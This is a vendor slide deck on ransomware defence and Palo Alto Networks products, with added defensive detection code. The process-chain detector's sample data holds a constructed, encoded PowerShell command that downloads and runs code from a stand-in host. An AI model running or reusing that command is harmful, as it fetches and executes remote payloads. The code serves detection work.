Protect Your Company Against Zero Day Attacks
Protect your company against Zero Day attacks
Mikkel Bossen | Channel SE, May 2021
© 2021 Palo Alto Networks, Inc. All rights reserved.

2020 Top Ransomware Variants
● Ryuk
● Maze (ChaCha)
● Defray777
● WastedLocker
● GandCrab + REvil
● NetWalker
● DoppelPaymer
● Dharma
● Phobos
● Zeppelin
Source: https://start.paloaltonetworks.com/unit-42-ransomware-threat-report.html

How is Ransomware delivered?

Unsecured RDP Connections
● 69% of organizations expose RDP (port 3389), up 30%.
● Sources: https://blog.shodan.io/trends-in-internet-exposure/ and the Unit 42 Cloud Threat Report "Putting the Sec into DevOps", Spring 2020.

Exposed RDP Adversary Workflow
Adversary → brute force or stolen credentials → exposed RDP server → extracts credentials from the server → moves laterally to other resources.

Further reading: "The anatomy of targeted ransomware attacks" (CFCS, the Danish Centre for Cyber Security; Danish title "Anatomien af målrettede ransomwareangreb"): https://cfcs.dk/globalassets/cfcs/dokumenter/rapporter/CFCS-rapport-anatomien-af-maalrettede-ransomwareangreb.pdf

Security Needs When Talking about Zero Day Attacks
● Protection against vulnerability exploitation
● Protection against execution of malicious code
● Visibility into the attack surface
● Segmentation of infrastructure (Zero Trust)
● Backup and recovery is essential
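A detection for the exposed-RDP workflow above, added here as an example; it is not from the deck and not from any Palo Alto Networks product. It runs over constructed Windows Security log events, counts failed RDP logons (event 4625, logon type 10) per source address inside a sliding window, and reports every source that crosses the threshold together with any later successful RDP logon from the same source, which is the point where the "stolen credentials" step has already happened. The event tuple layout, threshold and window are assumptions for the example.

```python
"""RDP brute-force detector over Windows Security log events.

Added example for the exposed-RDP workflow; not from the deck or any product.
Event IDs are the standard Windows ones (4625 failed logon, 4624 successful
logon) and LogonType 10 is RemoteInteractive, i.e. RDP. Events are constructed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAIL_THRESHOLD = 5                  # failures from one source inside WINDOW (assumed)
WINDOW = timedelta(minutes=10)      # sliding window (assumed)
RDP_LOGON_TYPE = 10

# Constructed sample events: (timestamp, event_id, logon_type, source_ip, account)
SAMPLE_EVENTS = [
    # one source spraying accounts over RDP, then getting in as svc_backup
    ("2021-05-03T08:00:01", 4625, 10, "198.51.100.7", "administrator"),
    ("2021-05-03T08:00:04", 4625, 10, "198.51.100.7", "admin"),
    ("2021-05-03T08:00:09", 4625, 10, "198.51.100.7", "backup"),
    ("2021-05-03T08:00:15", 4625, 10, "198.51.100.7", "sqlsvc"),
    ("2021-05-03T08:00:22", 4625, 10, "198.51.100.7", "svc_backup"),
    ("2021-05-03T08:00:31", 4625, 10, "198.51.100.7", "svc_backup"),
    ("2021-05-03T08:01:10", 4624, 10, "198.51.100.7", "svc_backup"),
    # a user mistyping once and then logging in: stays below the threshold
    ("2021-05-03T08:05:00", 4625, 10, "192.0.2.10", "alice"),
    ("2021-05-03T08:05:12", 4624, 10, "192.0.2.10", "alice"),
    # network (LogonType 3) failures are out of scope for an RDP detector
    ("2021-05-03T08:06:00", 4625, 3, "203.0.113.9", "administrator"),
    ("2021-05-03T08:06:01", 4625, 3, "203.0.113.9", "administrator"),
    ("2021-05-03T08:06:02", 4625, 3, "203.0.113.9", "administrator"),
    ("2021-05-03T08:06:03", 4625, 3, "203.0.113.9", "administrator"),
    ("2021-05-03T08:06:04", 4625, 3, "203.0.113.9", "administrator"),
]


def detect_rdp_brute_force(events, threshold=FAIL_THRESHOLD, window=WINDOW):
    """Return findings for sources with >= threshold RDP failures inside window.

    Each finding carries the total failures, the accounts tried and, when a
    later successful RDP logon came from the same source, that account and
    time: treat the credential as guessed and assume lateral movement from
    the victim host until the investigation shows otherwise.
    """
    recent = defaultdict(deque)     # source -> failure timestamps inside window
    totals = defaultdict(int)       # source -> all failures seen
    tried = defaultdict(set)        # source -> accounts attempted
    findings = {}
    for ts_str, event_id, logon_type, src, account in sorted(events):
        if logon_type != RDP_LOGON_TYPE:
            continue
        ts = datetime.fromisoformat(ts_str)
        if event_id == 4625:
            q = recent[src]
            q.append(ts)
            totals[src] += 1
            tried[src].add(account)
            while ts - q[0] > window:          # drop failures that aged out
                q.popleft()
            if len(q) >= threshold and src not in findings:
                findings[src] = {"source": src,
                                 "first_failure": q[0].isoformat(),
                                 "success_after": None}
        elif event_id == 4624 and src in findings and findings[src]["success_after"] is None:
            findings[src]["success_after"] = {"account": account, "time": ts.isoformat()}
    for src, f in findings.items():
        f["failures"] = totals[src]
        f["accounts"] = sorted(tried[src])
    return sorted(findings.values(), key=lambda f: f["source"])


if __name__ == "__main__":
    for finding in detect_rdp_brute_force(SAMPLE_EVENTS):
        print(finding)
```

On the constructed data only 198.51.100.7 is reported: six failures across five accounts, then a successful logon as svc_backup. Feed it real 4625/4624 records (any exporter that gives you the timestamp, logon type, source address and account) and tune the threshold to the noise level of your own RDP gateway.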
Preventing ransomware with machine learning powered NGFW
March 2021

Securing Your Transformed Enterprise
● STRATA, secure the enterprise: hybrid data center, Internet perimeter, branch & mobile, SD-WAN, 5G & IoT
● PRISMA, secure the cloud: SaaS, public cloud & DevOps, data lake, secure access
● CORTEX, secure the future: endpoint protection, detection & response, automation & orchestration, network traffic & behavioral analytics, threat intelligence

A Single Platform to Connect and Secure Everything
● Destinations: data center, public cloud, Internet, SaaS
● Centralized management with Unit 42 threat intelligence
● Capabilities: intrusion prevention, malware analysis, cloud access security, secure web gateway, IoT security, data loss protection, SD-WAN & MPLS
● Form factors: cloud-delivered, virtual, containerized, physical
● Locations: branch, HQ, partner, mobile, IoT

Zero Trust based security rules that support your business
● Rules are written in terms of users, devices and applications; no need to specify ports
● Rule usage data guides policy optimization
● All security subscriptions, one policy, one unified console
NGFW features and subscriptions
Cloud-delivered security subscriptions (the slide tags the newer ones with the PAN-OS release that introduced them: 8.1, 9.0, 9.1, 10.0):
● Threat Prevention: prevent all known threats across all traffic in a single pass
● URL Filtering: prevent access to known and new malicious websites
● DNS Security: disrupts attacks that use DNS for command-and-control and data theft
● IoT Security: visibility and protection of IoT and OT devices
● Data Loss Prevention: consistent protection from sensitive data loss
● GlobalProtect: VPN service that extends NGFW capabilities everywhere
● WildFire: ensures files are safe with automatic detection and prevention of unknown malware
● SD-WAN: networking and security natively integrated
NGFW value keeps increasing through continuous innovation.

Detect and Prevent New and Unknown Threats with WildFire Malware Analysis
● Inputs: web (malware, URLs, DNS, C2), Flash, scripts, archives, binaries, documents
● Analysis techniques: bare metal analysis, machine learning, dynamic unpacking, dynamic analysis, network traffic profiling, static analysis, recursive analysis
● Protections updated within seconds, globally; inline ML prevents patient zero
● Data collected from a vast global community (partner network, endpoint, cloud ecosystem); analysis techniques far beyond traditional sandboxing; automated protection against multiple attack variants

Slashing Our Industry-Leading Time for Distributed Protections
● Before: 5-minute signature generation/distribution time
● With PAN-OS 10.0: a threat detected anywhere across the 35K+ WildFire installed base has a signature created in seconds and content-based protection streamed to all customers' NGFWs in single-digit seconds
Today's Prevention of Unknown Threats Through Cloud Scale, PAN-OS 9.x
● Cloud-delivered security services (DNS Security, URL Filtering, WildFire, Data Lake) scale prevention capabilities
● Partner integrations and the Cyber Threat Alliance: shared intelligence allows the fastest distribution of protections
● Infinite scale | Trillions of samples analyzed | Fast, high-fidelity updates
● Time to protection: file protections 5 min, URL protections 1 min, DNS protections instant
Industry-leading security subscriptions offer unknown threat protection within minutes or less.

Prevention of Unknown Threats with Inline Machine Learning, PAN-OS 10
● Same cloud-delivered services and shared intelligence as above
● Time to protection: file protections instant, URL protections instant, DNS protections instant
● WildFire Inline ML and URL Filtering Inline ML: up to 95% of common file- and web-based threats prevented inline

Current Trends With TLS
95% of internet traffic today is encrypted (2016 vs. 2020).
● Encrypted traffic is now the norm: 70% of malware campaigns in 2020 will use encryption to conceal malicious activity (Gartner)
● Weak protocols will not be supported: TLS 1.0 and TLS 1.1 can be deprecated at any time; modern protocols (HTTP/2, TLS 1.3) are gaining popularity
● Obtaining certs is easier than ever: services like Let's Encrypt offer certificates for free
● Rapid move to the secure web (HTTPS): major browsers mark non-HTTPS sites as "Not Secure"

Massive Risks Within Encrypted Traffic
● Encrypted traffic is now the norm: 95% of internet traffic today is encrypted
● And attackers are taking advantage: more than 70% of malware campaigns in 2020 will use some type of encryption to conceal malicious activity, says Gartner
Sources: Encrypted Traffic (2016) | Encrypted Traffic (2020) | Encrypted Malware (Gartner)

Deploying Decryption Is Now Easier Than Ever with PAN-OS 10
● Mitigate security risks: control use of legacy TLS protocols, insecure ciphers and incorrectly configured certs
● Deploy decryption worry-free: easily deploy and maintain decryption using purpose-built troubleshooting and visibility
● Secure cloud apps quickly: secure traffic that uses protocols like TLS 1.3 and HTTP/2

Secure Encrypted Traffic Without Compromising Privacy
● Block dangerous/unsafe sessions: self-signed certs, unsafe TLS versions, untrusted certs, weak cipher suites, expired certs
● Do not decrypt (governed by regulations): healthcare, government, banking
● Decrypt and secure: all else

CORTEX XDR: Extended detection and response

Cortex Vision for Proactive Security
● Scope and protect your attack surface
● Prevent everything you can
● Everything you can't prevent, detect and investigate fast
● Automate response and get smarter with every incident

Our Approach: Breaking down data and product silos
● EPP (endpoint protection), EDR (endpoint detection & response), UBA (user behavior analytics), NDR (network detection & response)
● Prevention, detection and response across endpoint, network and cloud data
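The block / do-not-decrypt / decrypt split on the privacy slide, as an added example that is not part of the deck and is not PAN-OS policy syntax: a small evaluator over constructed TLS session records that blocks unsafe TLS versions, weak cipher suites and bad certificates before anything else (so a self-signed certificate on a healthcare site is still blocked, not passed through), exempts regulated categories from decryption, and decrypts everything else. The field names, category names, cipher-name markers, session records and evaluation time are assumptions for the example.

```python
"""Decryption-policy evaluator: block, pass through, or decrypt a TLS session.

Added example; not from the deck and not PAN-OS configuration. Precedence:
unsafe crypto or bad certificates -> block; regulated category -> no-decrypt;
everything else -> decrypt for inspection. Records below are constructed.
"""
from datetime import datetime, timezone

MIN_TLS_VERSION = (1, 2)      # TLS 1.0 and 1.1 are deprecated
# substrings of OpenSSL-style suite names marking weak or anonymous suites (assumed list)
WEAK_SUITE_MARKERS = ("RC4", "DES", "NULL", "EXP", "MD5", "ADH", "AECDH")
# assumed category names for traffic regulation says must not be decrypted
NO_DECRYPT_CATEGORIES = {"health-and-medicine", "government", "financial-services"}
# constructed evaluation time for the sample sessions
SAMPLE_NOW = datetime(2021, 5, 1, tzinfo=timezone.utc)


def evaluate_session(session, now):
    """Return (verdict, reasons); verdict is 'block', 'no-decrypt' or 'decrypt'.

    session (assumed schema): sni, category, tls_version as (major, minor),
    cipher as an OpenSSL-style suite name, cert with not_after (ISO 8601, UTC),
    self_signed and issuer_trusted.
    """
    reasons = []
    major, minor = session["tls_version"]
    if (major, minor) < MIN_TLS_VERSION:
        reasons.append(f"unsafe TLS version {major}.{minor}")
    suite = session["cipher"].upper()
    if any(marker in suite for marker in WEAK_SUITE_MARKERS):
        reasons.append(f"weak cipher suite {session['cipher']}")
    cert = session["cert"]
    if datetime.fromisoformat(cert["not_after"]) < now:
        reasons.append("expired certificate")
    if cert["self_signed"]:
        reasons.append("self-signed certificate")
    elif not cert["issuer_trusted"]:
        reasons.append("untrusted issuer")
    if reasons:                 # unsafe sessions are blocked even in exempt categories
        return "block", reasons
    if session["category"] in NO_DECRYPT_CATEGORIES:
        return "no-decrypt", [f"category {session['category']} exempt by regulation"]
    return "decrypt", ["default: inspect"]


def evaluate_all(sessions, now):
    """Map each session's SNI to its (verdict, reasons)."""
    return {s["sni"]: evaluate_session(s, now) for s in sessions}


GOOD_CERT = {"not_after": "2022-01-01T00:00:00+00:00", "self_signed": False, "issuer_trusted": True}
SAMPLE_SESSIONS = [   # constructed
    {"sni": "intranet.example.com", "category": "business-and-economy",
     "tls_version": (1, 3), "cipher": "TLS_AES_256_GCM_SHA384", "cert": GOOD_CERT},
    {"sni": "legacy.example.net", "category": "business-and-economy",
     "tls_version": (1, 0), "cipher": "RC4-SHA", "cert": GOOD_CERT},
    {"sni": "portal.clinic.example", "category": "health-and-medicine",
     "tls_version": (1, 2), "cipher": "ECDHE-RSA-AES128-GCM-SHA256", "cert": GOOD_CERT},
    {"sni": "updates.example.org", "category": "computer-and-internet-info",
     "tls_version": (1, 2), "cipher": "ECDHE-RSA-AES128-GCM-SHA256",
     "cert": {"not_after": "2021-03-01T00:00:00+00:00", "self_signed": False, "issuer_trusted": True}},
    {"sni": "ehr.hospital.example", "category": "health-and-medicine",
     "tls_version": (1, 2), "cipher": "ECDHE-RSA-AES256-GCM-SHA384",
     "cert": {"not_after": "2022-01-01T00:00:00+00:00", "self_signed": True, "issuer_trusted": False}},
]

if __name__ == "__main__":
    for sni, (verdict, reasons) in evaluate_all(SAMPLE_SESSIONS, SAMPLE_NOW).items():
        print(f"{sni:24} {verdict:10} {'; '.join(reasons)}")
```

The ordering is the point: the regulated-category exemption is checked only after the session has passed the crypto and certificate checks, so "do not decrypt" never becomes "do not look at all".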
Cortex XDR Agent Protection
Pre-execution:
● Reconnaissance Protection: prevents vulnerability profiling used by exploit kits
● Technique-Based Exploit Prevention: blocks exploit techniques used to manipulate good applications
● Kernel Protection: protects against exploits targeting or originating from the kernel
● Threat Intelligence: prevents known threats with intel gathered from WildFire
Cloud:
● AI-Driven Local Analysis: prevents unknown threats
● WildFire Analysis: detects advanced unknown threats
Post-execution:
● Malicious Process Prevention: stops script-based threats
● Ransomware Protection: blocks ransomware
● Behavioral Threat Protection: stops attacks by analyzing chains of endpoint events
Cross-platform protection (Windows, macOS, Linux); on- and offline protection; scheduled and on-demand scanning.

WastedLocker Attack Lifecycle
Web browser → malicious JS from downloaded ZIP file → PowerShell → Cobalt Strike loader → Cobalt Strike beacon → system utilities → ransomware execution

Cortex XDR Stops WastedLocker at Every Step
● Web browser, malicious JS from downloaded ZIP file: Behavioral Threat Protection
● PowerShell: Behavioral Threat Protection
● Cobalt Strike loader: Threat Intelligence
● Cobalt Strike beacon: Analytics, C2 detection
● System utilities: Behavioral Threat Protection and BIOC, lateral movement
● Ransomware execution: Ransomware Protection
Playbook: https://pan-unit42.github.io/playbook_viewer/?pb=wastedlocker-ransomware
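The chain-of-events idea behind Behavioral Threat Protection, as an added example that is not Cortex XDR's own logic or output: it rebuilds process ancestry from constructed process-creation events, flags a script host that ran a file out of a Downloads or Temp directory (the "malicious JS from downloaded ZIP" step) and then spawned PowerShell with an encoded command, decodes that command, and names the process that launched the script as the initiator so the analyst starts at the right end of the chain. The field names, paths, hosts and the encoded payload are constructed for the example.

```python
"""Process-chain detection for a WastedLocker-style delivery chain.

Added example; not Cortex XDR's logic or output. Rebuilds process ancestry
from process-creation events (assumed Sysmon-like fields: host, pid, ppid,
image, cmdline), flags script host -> encoded PowerShell where the script
came from a download/temp path, and decodes the payload. Data is constructed.
"""
import base64
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_PATH = re.compile(r"\\(Downloads|Temp)\\", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand
ENCODED_ARG = re.compile(
    r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Constructed stage-2 command; -enc takes base64 of UTF-16LE text
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/cs')"
_ENC = base64.b64encode(_STAGE2.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [   # constructed process-creation events
    # WS01: browser -> script host running a JS dropped in Temp -> encoded PowerShell
    {"host": "WS01", "pid": 100, "ppid": 1,   "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"host": "WS01", "pid": 200, "ppid": 100, "image": "chrome.exe",   "cmdline": "chrome.exe"},
    {"host": "WS01", "pid": 300, "ppid": 200, "image": "wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\Chrome.Update.js"'},
    {"host": "WS01", "pid": 400, "ppid": 300, "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    # WS02: admin running a plain PowerShell command from cmd.exe (benign)
    {"host": "WS02", "pid": 110, "ppid": 1,   "image": "cmd.exe", "cmdline": "cmd.exe"},
    {"host": "WS02", "pid": 120, "ppid": 110, "image": "powershell.exe",
     "cmdline": "powershell.exe Get-Service -Name Spooler"},
    # WS03: logon script from the domain share spawning plain PowerShell (benign)
    {"host": "WS03", "pid": 130, "ppid": 1,   "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"host": "WS03", "pid": 140, "ppid": 130, "image": "wscript.exe",
     "cmdline": r"wscript.exe \\dc01\netlogon\logon.vbs"},
    {"host": "WS03", "pid": 150, "ppid": 140, "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\mapdrives.ps1"},
]


def ancestry(event, by_key):
    """Return [event, parent, grandparent, ...] on the same host, root last."""
    chain, seen = [], set()
    key = (event["host"], event["pid"])
    while key in by_key and key not in seen:      # seen guards against pid reuse loops
        seen.add(key)
        chain.append(by_key[key])
        key = (key[0], by_key[key]["ppid"])
    return chain


def decode_encoded_command(cmdline):
    """Decoded -enc payload, None if there is none, '<undecodable>' if it is garbage."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:          # covers binascii.Error and UnicodeDecodeError
        return "<undecodable>"


def detect_script_to_encoded_powershell(events):
    """Flag encoded PowerShell whose parent is a script host running a downloaded file."""
    by_key = {(e["host"], e["pid"]): e for e in events}
    findings = []
    for ev in events:
        if ev["image"].lower() != "powershell.exe":
            continue
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is None:
            continue
        chain = ancestry(ev, by_key)
        if len(chain) < 2:
            continue
        parent = chain[1]
        if parent["image"].lower() not in SCRIPT_HOSTS or not DOWNLOAD_PATH.search(parent["cmdline"]):
            continue
        findings.append({
            "host": ev["host"],
            "chain": [c["image"] for c in reversed(chain)],        # root first
            "initiator": chain[2]["image"] if len(chain) > 2 else "<unknown>",
            "script": parent["cmdline"],
            "decoded_command": decoded,
        })
    return findings


if __name__ == "__main__":
    for finding in detect_script_to_encoded_powershell(SAMPLE_EVENTS):
        print(finding)
```

Only the WS01 chain is reported; the plain admin command and the logon script from the domain share are left alone because neither the path nor the encoding condition holds. The same walk extends naturally to the later steps on the slide (the loader and beacon spawned under that PowerShell), since every descendant resolves back to the same initiator.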
Cortex XDR data sources for detection
● Cortex Data Lake ingests network, endpoint, cloud and third-party data
● Third-party sources: Fortinet, Check Point, Cisco, Windows Events, Okta, Azure AD, PingOne, GCP, AWS, LEEF, Filebeat, Kubernetes

Key differentiator: supercharge investigation & response
● Unified Incident Engine: intelligently group related alerts into one incident
● Automated Root Cause Analysis: reveal the root cause of attacks in one click
● Integrated Response: quick actions to contain attacks, isolate hosts or run custom forensics

Summary
● NGFW: prevent unknown threats faster with WildFire inline ML and SSL decryption
● Cortex XDR Agent: prevent advanced attacks and ransomware
● Cortex XDR Pro: speed up investigation and response by combining endpoint and network data

Thank You
Mikkel Bossen | Channel SE, May 2021